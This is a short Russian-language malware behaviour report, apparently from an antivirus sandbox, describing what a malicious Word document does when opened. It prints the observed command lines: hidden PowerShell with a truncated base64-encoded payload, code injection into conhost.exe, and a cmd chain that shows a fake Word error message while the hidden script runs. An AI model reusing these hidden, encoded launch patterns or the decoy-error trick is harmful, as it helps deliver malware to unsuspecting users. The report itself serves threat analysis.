Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -ENCOD JAAwADYAVAAgAD0AIAAgAFsAVAB5AHAAZQBdACgAIgB7ADEAfQB7ADAAfQB7ADMAfQB7ADIAfQAiACAALQBGACcAZQBtAC4AaQBvAC4ARABpAHIARQBDACcALAAnAHMAWQBTAHQAJwAsACcAUgBZACcALAAnAFQA...
Внедряет код в
следующие системные процессы:
- <SYSTEM32>\conhost.exe
Другое
Ищет следующие окна
- ClassName: 'OleMainThreadWndClass' WindowName: ''
Запускает на исполнение
- '<SYSTEM32>\devicecensus.exe' UserCxt
- '<SYSTEM32>\cmd.exe' cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD JAAwADYAVAAgAD0AIAAgAFsAVAB5AHAAZQBdACgAIgB7ADEAfQB7ADAAfQB7AD...
- '<SYSTEM32>\msg.exe' user /v Word experienced an error trying to open the file.
- '<SYSTEM32>\fontdrvhost.exe'
- '<SYSTEM32>\wudfhost.exe' -HostGUID:{193a1820-d9ac-4997-8c55-be817523f6aa} -IoEventPortName:\UMDFCommunicationPorts\WUDF\HostProcess-f787bb2c-63d5-4dbe-a646-960df62572aa -SystemEventPortName:\UMDFCommunicationPorts\WUDF...
